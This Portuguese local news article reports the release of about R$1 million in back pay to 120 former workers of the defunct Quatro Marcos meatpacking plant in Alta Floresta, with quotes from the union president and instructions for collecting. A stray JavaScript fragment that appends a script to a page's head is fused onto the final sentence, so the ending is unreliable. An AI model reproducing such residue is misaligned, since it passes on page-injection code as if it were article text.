Da Redação
Uma ação coletiva movida por 120 trabalhadores do extinto frigorífico Quatro Marcos de Alta Floresta, na Justiça do Trabalho teve um desfecho favorável esta semana que vai aquecer a economia local.
A ação de insalubridade foi movida em 2008, pelo sindicato que representava a classe no município, e que depois passou a ser representada pelo Sindicato dos Trabalhadores nas Indústrias de Carnes e Laticínios do Portal da Amazônia (Sintracal). A justiça havia bloqueada em torno de R$ 1 milhão da empresa e agora foi liberado para pagamento dos ex-funcionários.
“A justiça do Trabalho liberou os pagamentos da ação de insalubridade, ficou muitos anos parada na justiça, praticamente 8 anos, e agora resolveu liberar os pagamentos. Tem em torno de R$ 1 milhão, lembrando bem que são funcionários que entraram com uma ação pelo sindicato no ano de 2008, não são todos os funcionários”, relatou o presidente do Sindicato, José Evandro Navarro.
O pagamento já está liberado e sendo contabilizado pela justiça. Para receber o dinheiro da ação, os funcionários que entraram com a ação devem procurar a sede do Sintracal que fica localizado na Avenida Ludovico da Riva Neto, no 1600 no prédio da Rodemar, munidos dos documentos pessoais e dados bancários para que a justiça possa fazer o pagamento direto na conta.
Para Navarro o liberação do dinheiro dessa ação chegou em um bom momento e que vai ajudar a aquecer a economia local. “Cerca de 20 pessoas já nos procurou e estão entusiasmados e felizes com o dinheiro, eles já fazem planos em comprar carro, motos, enfim, vai ajudar a aquecer economia da cidade”, pontuou o presidente.d.getElementsByTagName(‘head’)[0].appendChild(s);